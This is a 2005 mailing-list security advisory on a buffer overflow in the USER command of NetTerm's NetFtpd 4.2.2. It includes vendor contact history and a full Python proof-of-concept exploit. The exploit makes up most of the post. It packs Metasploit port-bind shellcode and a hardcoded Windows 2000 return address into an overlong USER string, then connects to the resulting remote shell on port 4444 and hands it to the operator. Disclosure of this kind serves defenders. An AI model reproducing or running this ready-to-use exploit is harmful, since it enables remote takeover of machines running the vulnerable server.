[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

ADV: NetTerm's NetFtpd 4.2.2 Buffer Overflow + PoC Exploit



See attached files.
Cheers,
  shadown

-- 
Sergio Alvarez
Security, Research & Development
IT Security Consultant
email: shadown@xxxxxxxxx

This message is confidential. It may also contain information that is
privileged or otherwise legally exempt from disclosure. If you have
received it by mistake please let us know by e-mail immediately and
delete it from your system; should also not copy the message nor
disclose its contents to anyone. Many thanks.
#
# Net-ftpd 4.2.2 user autentication b0f exploit (0day)
# coded by Sergio 'shadown' Alvarez
#

import struct
import socket
import sys
import time

class warftpd:
	def __init__(self, host, port):
		self.host		= host
		self.port		= port
		self.bsize		= 512
		self.ebpaddr	= 0xcacacaca
		self.retaddr	= 0xdeadbeef
		self.sctype		= 'findskt'
		self.scport		= None

	def setebpaddr(self, addr):
		self.ebpaddr = addr

	def setretaddr(self, addr):
		self.retaddr = addr

	def setbsize(self, size):
		self.bsize = size

	def setsctype(self, type):
		self.sctype = type

	def setscport(self, port):
		self.scport = port

	def genbuffer(self):
		## 
		# Alpha port bind 4444, thanx metasploit
		## 
		sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
		sc += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x51\x5a\x6a\x46"
		sc += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x56\x42\x32\x42\x41\x32"
		sc += "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x6b\x4c\x70"
		sc += "\x6a\x78\x6b\x70\x4f\x6d\x38\x59\x69\x49\x6f\x69\x6f\x6b\x4f\x61"
		sc += "\x70\x4c\x4b\x70\x6c\x35\x74\x66\x44\x6c\x4b\x73\x75\x45\x6c\x4c"
		sc += "\x4b\x31\x6c\x55\x55\x62\x58\x54\x41\x38\x6f\x6e\x6b\x50\x4f\x57"
		sc += "\x68\x4c\x4b\x33\x6f\x65\x70\x56\x61\x38\x6b\x69\x73\x50\x30\x37"
		sc += "\x39\x6c\x4b\x50\x34\x4e\x6b\x77\x71\x58\x6e\x34\x71\x4b\x70\x4a"
		sc += "\x39\x6e\x4c\x6b\x34\x4f\x30\x64\x34\x35\x57\x6b\x71\x6b\x7a\x56"
		sc += "\x6d\x53\x31\x78\x42\x7a\x4b\x69\x64\x35\x6b\x32\x74\x61\x34\x76"
		sc += "\x48\x44\x35\x4d\x33\x4c\x4b\x63\x6f\x56\x44\x37\x71\x5a\x4b\x50"
		sc += "\x66\x6e\x6b\x66\x6c\x32\x6b\x4c\x4b\x31\x4f\x45\x4c\x75\x51\x38"
		sc += "\x6b\x34\x43\x76\x4c\x4c\x4b\x6b\x39\x72\x4c\x45\x74\x47\x6c\x63"
		sc += "\x51\x7a\x63\x45\x61\x4f\x30\x53\x54\x4e\x6b\x67\x30\x30\x30\x4c"
		sc += "\x4b\x63\x70\x34\x4c\x4e\x6b\x34\x30\x37\x6c\x4e\x4d\x4e\x6b\x71"
		sc += "\x50\x55\x58\x61\x4e\x73\x58\x6e\x6e\x70\x4e\x64\x4e\x68\x6c\x70"
		sc += "\x50\x4b\x4f\x6b\x66\x30\x31\x49\x4b\x50\x66\x52\x73\x53\x56\x30"
		sc += "\x68\x74\x73\x57\x42\x43\x58\x61\x67\x61\x63\x75\x62\x63\x6f\x36"
		sc += "\x34\x49\x6f\x58\x50\x45\x38\x4a\x6b\x4a\x4d\x39\x6c\x57\x4b\x56"
		sc += "\x30\x69\x6f\x5a\x76\x43\x6f\x4d\x59\x78\x65\x35\x36\x4c\x41\x48"
		sc += "\x6d\x66\x68\x37\x72\x71\x45\x62\x4a\x64\x42\x6b\x4f\x38\x50\x35"
		sc += "\x38\x6e\x39\x64\x49\x7a\x55\x4c\x6d\x31\x47\x79\x6f\x6e\x36\x56"
		sc += "\x33\x62\x73\x72\x73\x30\x53\x71\x43\x77\x33\x30\x53\x67\x33\x36"
		sc += "\x33\x59\x6f\x7a\x70\x30\x66\x70\x68\x76\x71\x73\x6c\x41\x76\x72"
		sc += "\x73\x6f\x79\x7a\x41\x4c\x55\x32\x48\x4c\x64\x44\x5a\x74\x30\x4a"
		sc += "\x67\x56\x37\x49\x6f\x4a\x76\x51\x7a\x44\x50\x42\x71\x53\x65\x6b"
		sc += "\x4f\x38\x50\x30\x68\x6f\x54\x4e\x4d\x44\x6e\x79\x79\x30\x57\x79"
		sc += "\x6f\x68\x56\x41\x43\x30\x55\x4b\x4f\x4a\x70\x52\x48\x4d\x35\x67"
		sc += "\x39\x6f\x76\x30\x49\x33\x67\x6b\x4f\x4a\x76\x72\x70\x63\x64\x61"
		sc += "\x44\x30\x55\x49\x6f\x38\x50\x4c\x53\x65\x38\x4b\x57\x72\x59\x6a"
		sc += "\x66\x63\x49\x72\x77\x69\x6f\x78\x56\x41\x45\x4b\x4f\x6a\x70\x70"
		sc += "\x66\x70\x6a\x63\x54\x61\x76\x30\x68\x43\x53\x72\x4d\x6c\x49\x68"
		sc += "\x65\x53\x5a\x70\x50\x53\x69\x76\x49\x6a\x6c\x6f\x79\x4d\x37\x61"
		sc += "\x7a\x67\x34\x4e\x69\x59\x72\x37\x41\x6b\x70\x6a\x53\x4c\x6a\x59"
		sc += "\x6e\x53\x72\x56\x4d\x59\x6e\x33\x72\x64\x6c\x6c\x53\x4e\x6d\x42"
		sc += "\x5a\x35\x68\x4c\x6b\x6e\x4b\x4e\x4b\x72\x48\x44\x32\x6b\x4e\x4d"
		sc += "\x63\x54\x56\x79\x6f\x43\x45\x32\x64\x6b\x4f\x6b\x66\x33\x6b\x53"
		sc += "\x67\x30\x52\x63\x61\x66\x31\x52\x71\x53\x5a\x74\x41\x56\x31\x32"
		sc += "\x71\x73\x65\x50\x51\x4b\x4f\x5a\x70\x32\x48\x6c\x6d\x4a\x79\x47"
		sc += "\x75\x48\x4e\x62\x73\x6b\x4f\x7a\x76\x61\x7a\x6b\x4f\x6b\x4f\x35"
		sc += "\x67\x6b\x4f\x68\x50\x6e\x6b\x31\x47\x4b\x4c\x6d\x53\x68\x44\x41"
		sc += "\x74\x4b\x4f\x4e\x36\x36\x32\x49\x6f\x68\x50\x75\x38\x6c\x30\x4f"
		sc += "\x7a\x56\x64\x31\x4f\x43\x63\x59\x6f\x4a\x76\x4b\x4f\x38\x50\x46"
		
		# shellcode
		#sc		=	"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
		#sc		+=	"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
		#sc		+=	"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
		#sc		+=	"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
		#sc		+=	"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
		#sc		+=	"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
		#sc		+=	"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
		#sc		+=	"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
		#sc		+=	"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
		#sc		+=	"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
		#sc		+=	"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
		#sc		+=	"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
		#sc		+=	"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
		#sc		+=	"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
		#sc		+=	"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
		#sc		+=	"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
		#sc		+=	"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
		#sc		+=	"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
		#sc		+=	"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
		#sc		+=	"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
		#sc		+=	"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
		#sc		+=	"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
		#sc		+=	"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
		#sc		+=	"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
		#sc		+=	"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
		# other stuff
		nops	=	"\x41"*(self.bsize-len(sc)-50)
		ebp	=	struct.pack('<L', self.ebpaddr)
		# check if the value is an integer, otherwise it should be a string
		if self.retaddr.__class__.__name__ == 'int':
			ret	=	struct.pack('<L', self.retaddr)
		else:
			ret	=	self.retaddr
		# assemble buffer to send
		buffer	=	"USER "
		buffer	+=	nops
		buffer	+=	sc
		buffer	+=	'\x42'*(50-4)
		buffer	+=	ebp
		buffer	+=	ret
		return buffer

	def exploit(self):
		# connect
		skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		try:
			skt.connect((self.host, self.port))
		except socket.error, err:
			print "[-] Error: %s" % err[1]
			return None
		print "[+] Connected to %s:%d" % (self.host, self.port)
		# recv banner
		print "[+] Receiving Banner"
		res = skt.recv(100)
		print res
		# send payload
		time.sleep(1)
		print "[+] Sending payload"
		skt.send(self.genbuffer())
		time.sleep(2) # test on mcafee anti-b0f
		skt.close()
		# if successfull connect to the shell
		time.sleep(2)
		skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		try:
			skt.connect((self.host, 4444))
		except socket.error, err:
			print "[-] Error: %s" % err[1]
			print "[-] Explotation failed\n[-] Daemon should be dead..."
			return None
		print "[+] Connected to shell at %s on port %d" % (self.host, 4444)
		res = skt.recv(1024)
		if res:
			if res.count('Microsoft Windows'):
				print "[+] Welcome my lord, i'm here to serve you ;) ...\n"
				from telnetlib import Telnet
				telnet = Telnet()
				telnet.sock = skt
				try:
					telnet.interact()
				except:
					pass
				skt.close()
				print "[-] Bye..bye I hope you've enjoyed your stay.. ;)"
				return None
		skt.close()
		print '[-] Explotation failed\nDaemon should be dead...'

if __name__ == '__main__':
	if len(sys.argv) != 3:
		print "*************************************"
		print "* Coded by Sergio 'shadown' Alvarez *"
		print "*          shadown@xxxxxxxxx        *"
		print "*************************************"
		print "Usage: %s host port" % sys.argv[0]
		sys.exit(1)

	exp = warftpd(sys.argv[1], int(sys.argv[2]))
	exp.setsctype('findskt')
	exp.setscport(1234)
	exp.setbsize(1014)
	exp.setebpaddr(0xdeadbeef) # sometimes needed, just in case
	exp.setretaddr('\x4c\xfa\x12\x00') # Universal Win2k SP0/SP1/SP2/SP3/SP4 (jmp to our input buffer)
	exp.exploit()

Vendor: InterSoft International Inc.
Product: NetTerm
Version: 5.1.1, probably lower versions too
Vulnerability Type: Buffer Overflow
Download Link: http://www.securenetterm.com/pub/nt32511i.exe

Credits:
  Discovered by Sergio 'shadown' Alvarez, while dictating a 'Vuln-Dev on Win32 and Exploits Coding' course.

History:
  Discovered date: 21/04/2005
  Reported: 26/04/2005
  Vendor Response: 26/04/2005
  		This is a known bug that has been reported to our clients.
		Netftpd was a free addition to our NetTerm product, at the request of our clients.
		They were warned to never use netftpd as a general purpose ftp server, and to only use it behind a firewall.
		However, it does still present a potential problem, so we have removed it from the NetTerm distribution.
		Our www site at www.netterm.com and www.securenetterm.com has been updated with a version of NetTerm that does not contain the netftpd.exe program.
		We will also update the What's New page on both web sites for the new release in the next two days.
		Thanks for bringing to to our attention.	  
			Ken
  Patch Release: None
  Public Advisorie: 26/04/2005

Description:
  NetTerm is one of the most used win32 telnet client software.

Vulnerabilitie:
  NetTerm's NetFtpd 4.2.2 has a buffer overflow on authentication. I've just tested 'user' command, but probably other commands are vulnerable too.

Patch:
	None.

WorkAround:
  Don't use it.
  
PoC Exploit:
  Attached is a working exploit for Win2k, any SP.